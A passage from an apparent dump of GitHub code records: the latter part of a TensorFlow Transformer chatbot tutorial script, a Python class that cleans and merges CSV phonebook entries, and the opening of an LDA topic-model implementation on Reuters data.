END_TOKEN = [tokenizer.vocab_size], [tokenizer.vocab_size + 1]\n\n# Vocabulary size plus start and end token\nVOCAB_SIZE = tokenizer.vocab_size + 2\n\n#print('Tokenized sample question: {}'.format(tokenizer.encode(questions[20])))\n\n\n# Tokenize, filter and pad sentences\ndef tokenize_and_filter(inputs, outputs):\n tokenized_inputs, tokenized_outputs = [], []\n \n for (sentence1, sentence2) in zip(inputs, outputs):\n # tokenize sentence\n sentence1 = START_TOKEN + tokenizer.encode(sentence1) + END_TOKEN\n sentence2 = START_TOKEN + tokenizer.encode(sentence2) + END_TOKEN\n # check tokenized sentence max length\n if len(sentence1) <= MAX_LENGTH and len(sentence2) <= MAX_LENGTH:\n tokenized_inputs.append(sentence1)\n tokenized_outputs.append(sentence2)\n \n # pad tokenized sentences\n tokenized_inputs = tf.keras.preprocessing.sequence.pad_sequences(\n tokenized_inputs, maxlen=MAX_LENGTH, padding='post')\n tokenized_outputs = tf.keras.preprocessing.sequence.pad_sequences(\n 
tokenized_outputs, maxlen=MAX_LENGTH, padding='post')\n \n return tokenized_inputs, tokenized_outputs\n\n\nquestions, answers = tokenize_and_filter(questions, answers)\n\n#print('Vocab size: {}'.format(VOCAB_SIZE))\n#print('Number of samples: {}'.format(len(questions)))\n\n\"\"\"### Create `tf.data.Dataset`\n\nWe are going to use the [tf.data.Dataset API](https://www.tensorflow.org/api_docs/python/tf/data) to construct our input pipeline in order to utilize features like caching and prefetching to speed up the training process.\n\nThe transformer is an auto-regressive model: it makes predictions one part at a time, and uses its output so far to decide what to do next.\n\nDuring training, this example uses teacher forcing. Teacher forcing is passing the true output to the next time step regardless of what the model predicts at the current time step.\n\nAs the transformer predicts each word, self-attention allows it to look at the previous words in the input sequence to better predict the next word.\n\nTo prevent the model from peeking at the expected output, the model uses a look-ahead mask.\n\nThe target is divided into `decoder_inputs`, which is padded as an input to the decoder, and `cropped_targets` for calculating our loss and accuracy.\n\"\"\"\n\nBATCH_SIZE = 64\nBUFFER_SIZE = 20000\n\n# decoder inputs use the previous target as input\n# remove START_TOKEN from targets\ndataset = tf.data.Dataset.from_tensor_slices((\n {\n 'inputs': questions,\n 'dec_inputs': answers[:, :-1]\n },\n {\n 'outputs': answers[:, 1:]\n },\n))\n\ndataset = dataset.cache()\ndataset = dataset.shuffle(BUFFER_SIZE)\ndataset = dataset.batch(BATCH_SIZE)\ndataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\n#print(dataset)\n\n\"\"\"## Attention\n\n### Scaled dot product Attention\n\nThe scaled dot-product attention function used by the transformer takes three inputs: Q (query), K (key), V (value). The equation used to calculate the attention weights is:\n\n$$\\Large{Attention(Q, K, V) = softmax_k(\\frac{QK^T}{\\sqrt{d_k}}) V} $$\n\nAs the softmax normalization is done on the `key`, its values decide the amount of importance given to the `query`.\n\nThe output represents the multiplication of the attention weights and the `value` vector. This ensures that the words we want to focus on are kept as is and the irrelevant words are flushed out.\n\nThe dot-product attention is scaled by a factor of the square root of the depth. This is done because for large values of depth, the dot product grows large in magnitude, pushing the softmax function into regions where it has small gradients, resulting in a very hard softmax. \n\nFor example, consider that `query` and `key` have a mean of 0 and variance of 1. Their matrix multiplication will have a mean of 0 and variance of `dk`. Hence, *square root of `dk`* is used for scaling (and not any other number) because the matmul of `query` and `key` should have a mean of 0 and variance of 1, so that we get a gentler softmax.\n\nThe mask is multiplied with *-1e9 (close to negative infinity).* This is done because the mask is summed with the scaled matrix multiplication of `query` and `key` and is applied immediately before a softmax. The goal is to zero out these cells, and large negative inputs to softmax are near zero in the output.\n\"\"\"\n\ndef scaled_dot_product_attention(query, key, value, mask):\n \"\"\"Calculate the attention weights. 
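\n A NumPy sanity check of the formula above (a hedged sketch; the shapes are illustrative assumptions):\n # q = np.random.rand(2, 4); k = np.random.rand(3, 4); v = np.random.rand(3, 5)\n # scores = q @ k.T / np.sqrt(4) # (2, 3): one score per query/key pair\n # w = np.exp(scores) / np.exp(scores).sum(-1, keepdims=True) # softmax over the key axis\n # out = w @ v # (2, 5): weighted sum of values\n # assert np.allclose(w.sum(-1), 1.0)\n 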
\"\"\"\n matmul_qk = tf.matmul(query, key, transpose_b=True)\n\n # scale matmul_qk\n depth = tf.cast(tf.shape(key)[-1], tf.float32)\n logits = matmul_qk / tf.math.sqrt(depth)\n\n # add the mask to zero out padding tokens\n if mask is not None:\n logits += (mask * -1e9)\n\n # softmax is normalized on the last axis (seq_len_k)\n attention_weights = tf.nn.softmax(logits, axis=-1)\n\n output = tf.matmul(attention_weights, value)\n\n return output\n\n\"\"\"### Multi-head attention\n\n\"multi-head\n\n\nMulti-head attention consists of four parts:\n* Linear layers and split into heads.\n* Scaled dot-product attention.\n* Concatenation of heads.\n* Final linear layer.\n\nEach multi-head attention block gets three inputs; Q (query), K (key), V (value). These are put through linear (Dense) layers and split up into multiple heads. \n\nThe `scaled_dot_product_attention` defined above is applied to each head (broadcasted for efficiency). An appropriate mask must be used in the attention step. The attention output for each head is then concatenated (using `tf.transpose`, and `tf.reshape`) and put through a final `Dense` layer.\n\nInstead of one single attention head, `query`, `key`, and `value` are split into multiple heads because it allows the model to jointly attend to information at different positions from different representational spaces. After the split each head has a reduced dimensionality, so the total computation cost is the same as a single head attention with full dimensionality.\n\"\"\"\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n\n def __init__(self, d_model, num_heads, name=\"multi_head_attention\"):\n super(MultiHeadAttention, self).__init__(name=name)\n self.num_heads = num_heads\n self.d_model = d_model\n\n assert d_model % self.num_heads == 0\n\n self.depth = d_model // self.num_heads\n\n self.query_dense = tf.keras.layers.Dense(units=d_model)\n self.key_dense = tf.keras.layers.Dense(units=d_model)\n self.value_dense = tf.keras.layers.Dense(units=d_model)\n\n self.dense = tf.keras.layers.Dense(units=d_model)\n\n def split_heads(self, inputs, batch_size):\n inputs = tf.reshape(\n inputs, shape=(batch_size, -1, self.num_heads, self.depth))\n return tf.transpose(inputs, perm=[0, 2, 1, 3])\n\n def call(self, inputs):\n query, key, value, mask = inputs['query'], inputs['key'], inputs[\n 'value'], inputs['mask']\n batch_size = tf.shape(query)[0]\n\n # linear layers\n query = self.query_dense(query)\n key = self.key_dense(key)\n value = self.value_dense(value)\n\n # split heads\n query = self.split_heads(query, batch_size)\n key = self.split_heads(key, batch_size)\n value = self.split_heads(value, batch_size)\n\n # scaled dot-product attention\n scaled_attention = scaled_dot_product_attention(query, key, value, mask)\n\n scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3])\n\n # concatenation of heads\n concat_attention = tf.reshape(scaled_attention,\n (batch_size, -1, self.d_model))\n\n # final linear layer\n outputs = self.dense(concat_attention)\n\n return outputs\n\n\"\"\"## Transformer\n\n### Masking\n\n`create_padding_mask` and `create_look_ahead` are helper functions to creating masks to mask out padded tokens, we are going to use these helper functions as `tf.keras.layers.Lambda` layers.\n\nMask all the pad tokens (value `0`) in the batch to ensure the model does not treat padding as input.\n\"\"\"\n\ndef create_padding_mask(x):\n mask = tf.cast(tf.math.equal(x, 0), tf.float32)\n # (batch_size, 1, 1, sequence length)\n return mask[:, tf.newaxis, tf.newaxis, 
:]\n\n#print(create_padding_mask(tf.constant([[1, 2, 0, 3, 0], [0, 0, 0, 4, 5]])))\n\n\"\"\"Look-ahead mask to mask the future tokens in a sequence.\nWe also mask out pad tokens.\n\ni.e. To predict the third word, only the first and second word will be used\n\"\"\"\n\ndef create_look_ahead_mask(x):\n seq_len = tf.shape(x)[1]\n look_ahead_mask = 1 - tf.linalg.band_part(tf.ones((seq_len, seq_len)), -1, 0)\n padding_mask = create_padding_mask(x)\n return tf.maximum(look_ahead_mask, padding_mask)\n\n#print(create_look_ahead_mask(tf.constant([[1, 2, 0, 4, 5]])))\n\n\"\"\"### Positional encoding\n\nSince this model doesn't contain any recurrence or convolution, positional encoding is added to give the model some information about the relative position of the words in the sentence. \n\nThe positional encoding vector is added to the embedding vector. Embeddings represent a token in a d-dimensional space where tokens with similar meaning will be closer to each other. But the embeddings do not encode the relative position of words in a sentence. So after adding the positional encoding, words will be closer to each other based on the *similarity of their meaning and their position in the sentence*, in the d-dimensional space.\n\nSee the notebook on [positional encoding](https://github.com/tensorflow/examples/blob/master/community/en/position_encoding.ipynb) to learn more about it. The formula for calculating the positional encoding is as follows:\n\n$$\\Large{PE_{(pos, 2i)} = sin(pos / 10000^{2i / d_{model}})} $$\n$$\\Large{PE_{(pos, 2i+1)} = cos(pos / 10000^{2i / d_{model}})} $$\n\"\"\"\n\nclass PositionalEncoding(tf.keras.layers.Layer):\n\n def __init__(self, position, d_model):\n super(PositionalEncoding, self).__init__()\n self.pos_encoding = self.positional_encoding(position, d_model)\n\n def get_angles(self, position, i, d_model):\n angles = 1 / tf.pow(10000, (2 * (i // 2)) / tf.cast(d_model, tf.float32))\n return position * angles\n\n def positional_encoding(self, position, d_model):\n angle_rads = self.get_angles(\n position=tf.range(position, dtype=tf.float32)[:, tf.newaxis],\n i=tf.range(d_model, dtype=tf.float32)[tf.newaxis, :],\n d_model=d_model)\n # apply sin to even index in the array\n sines = tf.math.sin(angle_rads[:, 0::2])\n # apply cos to odd index in the array\n cosines = tf.math.cos(angle_rads[:, 1::2])\n\n pos_encoding = tf.concat([sines, cosines], axis=-1)\n pos_encoding = pos_encoding[tf.newaxis, ...]\n return tf.cast(pos_encoding, tf.float32)\n\n def call(self, inputs):\n return inputs + self.pos_encoding[:, :tf.shape(inputs)[1], :]\n\n\"\"\"### Encoder Layer\n\nEach encoder layer consists of sublayers:\n\n1. Multi-head attention (with padding mask) \n2. 2 dense layers followed by dropout\n\nEach of these sublayers has a residual connection around it followed by a layer normalization. Residual connections help in avoiding the vanishing gradient problem in deep networks.\n\nThe output of each sublayer is `LayerNorm(x + Sublayer(x))`. 
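\nA quick check of the residual pattern (a hedged sketch; the tensors are illustrative assumptions): LayerNorm normalizes over the last (d_model) axis, so each position comes out with roughly zero mean and unit variance.\n\n # demo_x = tf.random.uniform((1, 3, 8)) # (batch, seq_len, d_model)\n # demo_out = tf.keras.layers.LayerNormalization(epsilon=1e-6)(demo_x + demo_x)\n # tf.reduce_mean(demo_out[0, 0]) # ~0.0 for every position\n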
The normalization is done on the `d_model` (last) axis.\n\"\"\"\n\ndef encoder_layer(units, d_model, num_heads, dropout, name=\"encoder_layer\"):\n inputs = tf.keras.Input(shape=(None, d_model), name=\"inputs\")\n padding_mask = tf.keras.Input(shape=(1, 1, None), name=\"padding_mask\")\n\n attention = MultiHeadAttention(\n d_model, num_heads, name=\"attention\")({\n 'query': inputs,\n 'key': inputs,\n 'value': inputs,\n 'mask': padding_mask\n })\n attention = tf.keras.layers.Dropout(rate=dropout)(attention)\n attention = tf.keras.layers.LayerNormalization(\n epsilon=1e-6)(inputs + attention)\n\n outputs = tf.keras.layers.Dense(units=units, activation='relu')(attention)\n outputs = tf.keras.layers.Dense(units=d_model)(outputs)\n outputs = tf.keras.layers.Dropout(rate=dropout)(outputs)\n outputs = tf.keras.layers.LayerNormalization(\n epsilon=1e-6)(attention + outputs)\n\n return tf.keras.Model(\n inputs=[inputs, padding_mask], outputs=outputs, name=name)\n\n\"\"\"### Encoder\n\nThe Encoder consists of:\n1. Input Embedding\n2. Positional Encoding\n3. `num_layers` encoder layers\n\nThe input is put through an embedding which is summed with the positional encoding. The output of this summation is the input to the encoder layers. The output of the encoder is the input to the decoder.\n\"\"\"\n\ndef encoder(vocab_size,\n num_layers,\n units,\n d_model,\n num_heads,\n dropout,\n name=\"encoder\"):\n inputs = tf.keras.Input(shape=(None,), name=\"inputs\")\n padding_mask = tf.keras.Input(shape=(1, 1, None), name=\"padding_mask\")\n\n embeddings = tf.keras.layers.Embedding(vocab_size, d_model)(inputs)\n embeddings *= tf.math.sqrt(tf.cast(d_model, tf.float32))\n embeddings = PositionalEncoding(vocab_size, d_model)(embeddings)\n\n outputs = tf.keras.layers.Dropout(rate=dropout)(embeddings)\n\n for i in range(num_layers):\n outputs = encoder_layer(\n units=units,\n d_model=d_model,\n num_heads=num_heads,\n dropout=dropout,\n name=\"encoder_layer_{}\".format(i),\n )([outputs, padding_mask])\n\n return tf.keras.Model(\n inputs=[inputs, padding_mask], outputs=outputs, name=name)\n\n\"\"\"### Decoder Layer\n\nEach decoder layer consists of sublayers:\n\n1. Masked multi-head attention (with look ahead mask and padding mask)\n2. Multi-head attention (with padding mask). `value` and `key` receive the *encoder output* as inputs. `query` receives the *output from the masked multi-head attention sublayer.*\n3. 2 dense layers followed by dropout\n\nEach of these sublayers has a residual connection around it followed by a layer normalization. The output of each sublayer is `LayerNorm(x + Sublayer(x))`. The normalization is done on the `d_model` (last) axis.\n\nAs `query` receives the output from decoder's first attention block, and `key` receives the encoder output, the attention weights represent the importance given to the decoder's input based on the encoder's output. In other words, the decoder predicts the next word by looking at the encoder output and self-attending to its own output. 
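\nWhat the combined mask from create_look_ahead_mask() looks like for a short sequence (a hedged illustration; the 4-token input is arbitrary). Position i may only attend to positions <= i, and the padded last token stays masked in every row:\n\n # create_look_ahead_mask(tf.constant([[1, 2, 3, 0]]))[0, 0]\n # [[0. 1. 1. 1.]\n # [0. 0. 1. 1.]\n # [0. 0. 0. 1.]\n # [0. 0. 0. 1.]]\n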
See the demonstration above in the scaled dot product attention section.\n\"\"\"\n\ndef decoder_layer(units, d_model, num_heads, dropout, name=\"decoder_layer\"):\n inputs = tf.keras.Input(shape=(None, d_model), name=\"inputs\")\n enc_outputs = tf.keras.Input(shape=(None, d_model), name=\"encoder_outputs\")\n look_ahead_mask = tf.keras.Input(\n shape=(1, None, None), name=\"look_ahead_mask\")\n padding_mask = tf.keras.Input(shape=(1, 1, None), name='padding_mask')\n\n attention1 = MultiHeadAttention(\n d_model, num_heads, name=\"attention_1\")(inputs={\n 'query': inputs,\n 'key': inputs,\n 'value': inputs,\n 'mask': look_ahead_mask\n })\n attention1 = tf.keras.layers.LayerNormalization(\n epsilon=1e-6)(attention1 + inputs)\n\n attention2 = MultiHeadAttention(\n d_model, num_heads, name=\"attention_2\")(inputs={\n 'query': attention1,\n 'key': enc_outputs,\n 'value': enc_outputs,\n 'mask': padding_mask\n })\n attention2 = tf.keras.layers.Dropout(rate=dropout)(attention2)\n attention2 = tf.keras.layers.LayerNormalization(\n epsilon=1e-6)(attention2 + attention1)\n\n outputs = tf.keras.layers.Dense(units=units, activation='relu')(attention2)\n outputs = tf.keras.layers.Dense(units=d_model)(outputs)\n outputs = tf.keras.layers.Dropout(rate=dropout)(outputs)\n outputs = tf.keras.layers.LayerNormalization(\n epsilon=1e-6)(outputs + attention2)\n\n return tf.keras.Model(\n inputs=[inputs, enc_outputs, look_ahead_mask, padding_mask],\n outputs=outputs,\n name=name)\n\n\"\"\"### Decoder\n\nThe Decoder consists of:\n1. Output Embedding\n2. Positional Encoding\n3. N decoder layers\n\nThe target is put through an embedding which is summed with the positional encoding. The output of this summation is the input to the decoder layers. The output of the decoder is the input to the final linear layer.\n\"\"\"\n\ndef decoder(vocab_size,\n num_layers,\n units,\n d_model,\n num_heads,\n dropout,\n name='decoder'):\n inputs = tf.keras.Input(shape=(None,), name='inputs')\n enc_outputs = tf.keras.Input(shape=(None, d_model), name='encoder_outputs')\n look_ahead_mask = tf.keras.Input(\n shape=(1, None, None), name='look_ahead_mask')\n padding_mask = tf.keras.Input(shape=(1, 1, None), name='padding_mask')\n \n embeddings = tf.keras.layers.Embedding(vocab_size, d_model)(inputs)\n embeddings *= tf.math.sqrt(tf.cast(d_model, tf.float32))\n embeddings = PositionalEncoding(vocab_size, d_model)(embeddings)\n\n outputs = tf.keras.layers.Dropout(rate=dropout)(embeddings)\n\n for i in range(num_layers):\n outputs = decoder_layer(\n units=units,\n d_model=d_model,\n num_heads=num_heads,\n dropout=dropout,\n name='decoder_layer_{}'.format(i),\n )(inputs=[outputs, enc_outputs, look_ahead_mask, padding_mask])\n\n return tf.keras.Model(\n inputs=[inputs, enc_outputs, look_ahead_mask, padding_mask],\n outputs=outputs,\n name=name)\n\n\"\"\"### Transformer\n\nTransformer consists of the encoder, decoder and a final linear layer. 
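\nA shape walk-through of the assembly below (a hedged sketch; the tiny hyper-parameters are arbitrary assumptions): token IDs of shape (batch, input_len) and (batch, target_len) come out as per-position vocabulary logits.\n\n # demo_tr = transformer(vocab_size=100, num_layers=1, units=32,\n # d_model=16, num_heads=2, dropout=0.1)\n # demo_tr([tf.ones((2, 7)), tf.ones((2, 5))]).shape # -> (2, 5, 100)\n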
The output of the decoder is the input to the linear layer and its output is returned.\n\"\"\"\n\ndef transformer(vocab_size,\n num_layers,\n units,\n d_model,\n num_heads,\n dropout,\n name=\"transformer\"):\n inputs = tf.keras.Input(shape=(None,), name=\"inputs\")\n dec_inputs = tf.keras.Input(shape=(None,), name=\"dec_inputs\")\n\n enc_padding_mask = tf.keras.layers.Lambda(\n create_padding_mask, output_shape=(1, 1, None),\n name='enc_padding_mask')(inputs)\n # mask the future tokens for decoder inputs at the 1st attention block\n look_ahead_mask = tf.keras.layers.Lambda(\n create_look_ahead_mask,\n output_shape=(1, None, None),\n name='look_ahead_mask')(dec_inputs)\n # mask the encoder outputs for the 2nd attention block\n dec_padding_mask = tf.keras.layers.Lambda(\n create_padding_mask, output_shape=(1, 1, None),\n name='dec_padding_mask')(inputs)\n\n enc_outputs = encoder(\n vocab_size=vocab_size,\n num_layers=num_layers,\n units=units,\n d_model=d_model,\n num_heads=num_heads,\n dropout=dropout,\n )(inputs=[inputs, enc_padding_mask])\n\n dec_outputs = decoder(\n vocab_size=vocab_size,\n num_layers=num_layers,\n units=units,\n d_model=d_model,\n num_heads=num_heads,\n dropout=dropout,\n )(inputs=[dec_inputs, enc_outputs, look_ahead_mask, dec_padding_mask])\n\n outputs = tf.keras.layers.Dense(units=vocab_size, name=\"outputs\")(dec_outputs)\n\n return tf.keras.Model(inputs=[inputs, dec_inputs], outputs=outputs, name=name)\n\n\"\"\"## Train model\n\n### Initialize model\n\nTo keep this example small and relatively fast, the values for *num_layers, d_model, and units* have been reduced. See the [paper](https://arxiv.org/abs/1706.03762) for all the other versions of the transformer.\n\"\"\"\n\nprint(\"Initializing and compiling model.\")\n\ntf.keras.backend.clear_session()\n\n# Hyper-parameters\nNUM_LAYERS = 4\nD_MODEL = 512\nNUM_HEADS = 8\nUNITS = 2048\nDROPOUT = 0.1\n\nmodel = transformer(\n vocab_size=VOCAB_SIZE,\n num_layers=NUM_LAYERS,\n units=UNITS,\n d_model=D_MODEL,\n num_heads=NUM_HEADS,\n dropout=DROPOUT)\n\n\"\"\"### Loss function\n\nSince the target sequences are padded, it is important to apply a padding mask when calculating the loss.\n\"\"\"\n\ndef loss_function(y_true, y_pred):\n y_true = tf.reshape(y_true, shape=(-1, MAX_LENGTH - 1))\n \n loss = tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=True, reduction='none')(y_true, y_pred)\n\n mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)\n loss = tf.multiply(loss, mask)\n\n return tf.reduce_mean(loss)\n\n\"\"\"### Custom learning rate\n\nUse the Adam optimizer with a custom learning rate scheduler according to the formula in the [paper](https://arxiv.org/abs/1706.03762).\n\n$$\\Large{lrate = d_{model}^{-0.5} * min(step{\\_}num^{-0.5}, step{\\_}num * warmup{\\_}steps^{-1.5})}$$\n\"\"\"\n\nclass CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):\n\n def __init__(self, d_model, warmup_steps=4000):\n super(CustomSchedule, self).__init__()\n\n self.d_model = d_model\n self.d_model = tf.cast(self.d_model, tf.float32)\n\n self.warmup_steps = warmup_steps\n\n def __call__(self, step):\n arg1 = tf.math.rsqrt(step)\n arg2 = step * (self.warmup_steps**-1.5)\n\n return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)\n\n\"\"\"### Compile Model\"\"\"\n\nlearning_rate = CustomSchedule(D_MODEL)\n\noptimizer = tf.keras.optimizers.Adam(\n learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)\n\ndef accuracy(y_true, y_pred):\n # ensure labels have shape (batch_size, MAX_LENGTH - 1)\n y_true = 
tf.reshape(y_true, shape=(-1, MAX_LENGTH - 1))\n return tf.keras.metrics.sparse_categorical_accuracy(y_true, y_pred)\n\nmodel.compile(optimizer=optimizer, loss=loss_function, metrics=[accuracy])\n\nprint(\"Model compiled. Starting training.\")\n\n\"\"\"### Fit model\n\nTrain our transformer by simply calling `model.fit()`\n\"\"\"\n\ncheckpoint_path = \"training/\"+data_name+\"_cp.ckpt\"\ncheckpoint_dir = os.path.dirname(checkpoint_path)\n\n# Create a callback that saves the model's weights\ncp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,\n save_weights_only=True,\n verbose=1)\n\n# Create an early stopping callback\nearlystop_callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss',\n patience=3)\n\n# Split dataset to get validation\nval_dataset = dataset.take(VALIDATION_SIZE)\ntrain_dataset = dataset.skip(VALIDATION_SIZE)\n\nif new_training:\n model.fit(train_dataset, epochs=EPOCHS, validation_data=val_dataset, callbacks=[cp_callback, earlystop_callback])\nelse:\n model.load_weights(checkpoint_path)\n\n\"\"\"## Evaluate and predict\n\nThe following steps are used for evaluation:\n\n* Apply the same preprocessing method we used to create our dataset for the input sentence.\n* Tokenize the input sentence and add `START_TOKEN` and `END_TOKEN`. \n* Calculate the padding masks and the look ahead masks.\n* The decoder then outputs the predictions by looking at the encoder output and its own output.\n* Select the last word and calculate the argmax of that.\n* Concatenate the predicted word to the decoder input and pass it to the decoder.\n* In this approach, the decoder predicts the next word based on the previous words it predicted.\n\nNote: The model used here has less capacity and was trained on a subset of the full dataset, hence its performance can be further improved.\n\"\"\"\n\ndef evaluate(sentence):\n sentence = preprocess_sentence(sentence)\n\n sentence = tf.expand_dims(\n START_TOKEN + tokenizer.encode(sentence) + END_TOKEN, axis=0)\n\n output = tf.expand_dims(START_TOKEN, 0)\n\n for i in range(MAX_LENGTH):\n predictions = model(inputs=[sentence, output], training=False)\n\n # select the last word from the seq_len dimension\n predictions = predictions[:, -1:, :]\n predicted_id = tf.cast(tf.argmax(predictions, axis=-1), tf.int32)\n\n # return the result if the predicted_id is equal to the end token\n if tf.equal(predicted_id, END_TOKEN[0]):\n break\n\n # concatenate the predicted_id to the output, which is given to the decoder\n # as its input.\n output = tf.concat([output, predicted_id], axis=-1)\n\n return tf.squeeze(output, axis=0)\n\n\ndef predict(sentence):\n prediction = evaluate(sentence)\n\n predicted_sentence = tokenizer.decode(\n [i for i in prediction if i < tokenizer.vocab_size])\n\n return predicted_sentence\n\n\"\"\"Run model!\"\"\"\n\nprint(\"Model trained. Ready to run! Verification code: Zh1Alex9dU\")\n\ndef main():\n while True:\n inp = input()\n print(predict(inp))\n\nmain()\n\n\"\"\"## Summary\n\nHere we are: we have implemented a Transformer in TensorFlow 2.0 in around 500 lines of code.\n\nIn this tutorial, we focused on two different approaches to implementing complex models, the Functional API and Model subclassing, and on how to combine them.\n\nTry using a different dataset or hyper-parameters to train the Transformer! 
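\nA hedged usage sketch of the helpers above (the input text is arbitrary): evaluate() greedily decodes one subword at a time until END_TOKEN or MAX_LENGTH, and predict() detokenizes the result.\n\n # demo_reply = predict('how are you ?')\n # print(demo_reply) # a decoded response string\n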
Thanks for reading.\n\"\"\"","repo_name":"Hailiax/GT-fakeTrumpAI-Twitter-Bot","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":28992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23639005178","text":"import csv\nimport re\n\nPHONE_SEARCH_PATTERN = r'(\\+7|8)*[\\s\\(]*(\\d{3})[\\)\\s-]*(\\d{3})[-]*(\\d{2})[-]*(\\d{2})[\\s\\(]*(доб\\.)*[\\s]*(\\d+)*[\\)]*'\nPHONE_SUB_PATTERN = r'+7(\\2)-\\3-\\4-\\5 \\6\\7'\n\nclass PhoneBook:\n def __init__(self, raw_data_path):\n raw_contact_list = self._get_raw(raw_data_path)\n contact_list_with_doubles = self._process_raw_data(raw_contact_list)\n self.pure_contact_list = self._make_pure_contact_list(contact_list_with_doubles)\n\n @staticmethod\n def _get_raw(data):\n with open(data, encoding='utf-8') as file:\n rows = csv.reader(file, delimiter=\",\")\n result = list(rows)\n return result\n\n @staticmethod\n def _process_raw_data(data):\n result = list()\n for row in data:\n record = list()\n full_name = re.findall(r'(\\w+)', ' '.join(row[:3]))\n full_name.append('') if len(full_name) < 3 else ...\n record += full_name\n record.append(row[3])\n record.append(row[4])\n record.append(re.sub(PHONE_SEARCH_PATTERN, PHONE_SUB_PATTERN, row[5]).strip())\n record.append(row[6])\n result.append(record)\n return result\n\n def _make_pure_contact_list(self, data):\n result = dict()\n for item in data:\n result[item[0]] = self._merge_doubles(item, result[item[0]]) if item[0] in result else item\n return result.values()\n\n @staticmethod\n def _merge_doubles(record_one, record_two):\n result = list()\n for index in range(len(record_one)):\n result.append(record_one[index]) if record_one[index] else result.append(record_two[index])\n return result\n\n def fix(self, pure_data_path):\n with open(pure_data_path, \"w\", encoding='utf-8', newline='') as file:\n writer = csv.writer(file, delimiter=',')\n writer.writerows(self.pure_contact_list)\n print('Phonebook fixed, data saved in application/data/phonebook_pure.csv')\n","repo_name":"alfa-netology/advanced-py-hw-05-oop","sub_path":"application/cls_phonebook.py","file_name":"cls_phonebook.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34627480330","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom nltk.corpus import reuters, stopwords\r\nfrom nltk.stem.porter import PorterStemmer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.multiclass import OneVsRestClassifier, OneVsOneClassifier\r\nfrom sklearn import svm\r\nfrom sklearn.preprocessing import MultiLabelBinarizer, LabelEncoder\r\nfrom scipy.special import digamma\r\nimport numpy as np\r\nimport lda\r\nfrom reuters_utils import softmax, log_gamma, log_sum, trigamma, opt_alpha\r\nimport time\r\nfrom matplotlib import pyplot as plt\r\n#reuters.fileids()[-10:]\r\n#len(reuters.categories())\r\n#reuters.categories('training/9989')\r\n#print(*reuters.words(idlist[-1]), sep = '\\n')\r\n \r\n\r\nclass LDA_Model:\r\n def __init__(self, num_topics, num_terms, alpha=1.0):\r\n self.num_topics = num_topics\r\n self.num_terms = num_terms\r\n self.alpha = alpha\r\n self.log_prob_w = np.random.random([num_topics, num_terms]) + 1/num_terms\r\n \r\n\r\nclass Document:\r\n def __init__(self,doc_id, words_id, K,label = None):\r\n # words_id: a list of positions of words in vocabulary\r\n self.words = words_id\r\n self.length = len(words_id)\r\n self.terms, 
self.term_counts = np.unique(words_id, return_counts = True)\r\n self.num_terms = len(self.terms)\r\n self.doc_id = doc_id\r\n self.label = label\r\n self.gamma = np.zeros(K)\r\n self.phi = np.zeros([self.num_terms,K])\r\n\r\nclass LDA_Suffstats:\r\n def __init__(self,model):\r\n self.class_total = np.zeros(model.num_topics)\r\n self.class_term = np.zeros([model.num_topics, model.num_terms])\r\n self.num_docs = 0\r\n self.alpha_suffstats = 0\r\n\r\n\r\ndef compute_likelihood(doc, model, phi, gamma):\r\n likelihood = 0\r\n dig = digamma(gamma)\r\n gamma_sum = np.sum(gamma)\r\n digsum = digamma(gamma_sum)\r\n likelihood = (likelihood + log_gamma(model.alpha * model.num_topics) \r\n - model.num_topics * log_gamma(model.alpha)\r\n - log_gamma(gamma_sum))\r\n \r\n likelihood = (likelihood + model.alpha * np.sum(dig - digsum)\r\n - np.sum((gamma - 1) * (dig - digsum)))\r\n\r\n for k in range(model.num_topics):\r\n likelihood += log_gamma(gamma[k])\r\n\r\n for n in range(doc.num_terms):\r\n for k in range(model.num_topics):\r\n if phi[n,k] > 0:\r\n likelihood = (likelihood + doc.term_counts[n] * (phi[n,k] * ((dig[k] - digsum) - np.log(phi[n,k]) + model.log_prob_w[k,doc.terms[n]])))\r\n \r\n return likelihood\r\n\r\n\r\ndef variational_inference(doc, model, max_iter, converge_thresh = 1e-6 ):\r\n '''\r\n doc: the dth document\r\n gamma: 1 x K (number_of_topics)\r\n digamma_gamma: 1 x K\r\n phi: N_d(number of terms in dth document) x K\r\n '''\r\n gamma = doc.gamma\r\n phi = doc.phi\r\n converged = 1\r\n phisum = 0\r\n likelihood = 0\r\n likelihood_old = 0\r\n oldphi = np.zeros([model.num_topics])\r\n digamma_gamma = np.zeros([model.num_topics])\r\n \r\n # initialization of gamma and phi\r\n gamma = np.ones(model.num_topics) * (model.alpha + doc.length / model.num_topics)\r\n digamma_gamma = digamma(gamma)\r\n phi = np.ones([doc.num_terms,model.num_topics]) / model.num_topics\r\n #print('digamma:{}'.format(digamma_gamma))\r\n # inference loop\r\n i_iter = 0\r\n while (converged > converge_thresh) and (i_iter < max_iter or max_iter == -1):\r\n i_iter = i_iter + 1\r\n for n in range(doc.num_terms):\r\n phisum = 0\r\n for k in range(model.num_topics): \r\n oldphi[k] = phi[n,k]\r\n phi[n,k] = digamma_gamma[k] + model.log_prob_w[k, doc.terms[n]]\r\n\r\n if k > 0:\r\n phisum = log_sum(phisum, phi[n,k])\r\n else:\r\n phisum = phi[n, k]\r\n \r\n #End For\r\n \r\n phi[n,:] = np.exp(phi[n,:] - phisum)\r\n gamma = gamma + doc.term_counts[n] * (phi[n,:] - oldphi)\r\n digamma_gamma = digamma(gamma)\r\n\r\n #End For\r\n likelihood = compute_likelihood(doc, model, phi, gamma)\r\n if i_iter > 1:\r\n converged = (likelihood_old - likelihood) / likelihood_old\r\n likelihood_old = likelihood\r\n \r\n #End while\r\n #print(\"[Variational Inference Summary] Iteration: {0} Likelihood: {1:.0f} 